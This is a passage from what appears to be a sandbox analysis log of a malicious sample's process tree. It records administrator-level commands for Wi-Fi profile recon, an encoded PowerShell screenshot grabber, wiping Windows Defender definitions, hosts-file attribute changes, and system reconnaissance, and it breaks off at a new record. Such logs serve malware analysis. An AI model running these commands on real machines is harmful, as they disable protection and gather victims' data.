                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:64
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:netsh wlan show profile
                                                                                                                                                                                                                                              Imagebase:0xe0000
                                                                                                                                                                                                                                              File size:96'768 bytes
                                                                                                                                                                                                                                              MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:65
                                                                                                                                                                                                                                              Start time:02:37:33
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:66
                                                                                                                                                                                                                                              Start time:02:37:34
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                              Imagebase:0x7ff7dfee0000
                                                                                                                                                                                                                                              File size:468'120 bytes
                                                                                                                                                                                                                                              MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:67
                                                                                                                                                                                                                                              Start time:02:37:35
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:68
                                                                                                                                                                                                                                              Start time:02:37:35
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:69
                                                                                                                                                                                                                                              Start time:02:37:35
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:70
                                                                                                                                                                                                                                              Start time:02:37:35
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:71
                                                                                                                                                                                                                                              Start time:02:37:36
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff733b70000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:72
                                                                                                                                                                                                                                              Start time:02:37:36
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                              Imagebase:0x7ff6f18f0000
                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:73
                                                                                                                                                                                                                                              Start time:02:37:36
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline"
                                                                                                                                                                                                                                              Imagebase:0x7ff664450000
                                                                                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:75
                                                                                                                                                                                                                                              Start time:02:37:36
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES226F.tmp" "c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP"
                                                                                                                                                                                                                                              Imagebase:0x7ff7e4b90000
                                                                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:77
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:78
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:79
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:80
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:81
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:82
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:83
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:getmac
                                                                                                                                                                                                                                              Imagebase:0x7ff6f5dd0000
                                                                                                                                                                                                                                              File size:90'112 bytes
                                                                                                                                                                                                                                              MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:84
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff733b70000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:85
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                              Imagebase:0x7ff6f18f0000
                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:86
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:87
                                                                                                                                                                                                                                              Start time:02:37:39
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:88
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:89
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                              Imagebase:0x7ff644170000
                                                                                                                                                                                                                                              File size:106'496 bytes
                                                                                                                                                                                                                                              MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:90
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:91
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff733b70000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:92
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              Imagebase:0x7ff63a870000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:93
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:94
                                                                                                                                                                                                                                              Start time:02:37:40
                                                                                                                                                                                                                                              Start date:13/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                                              Imagebase:0x7ff733b70000
                                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:95
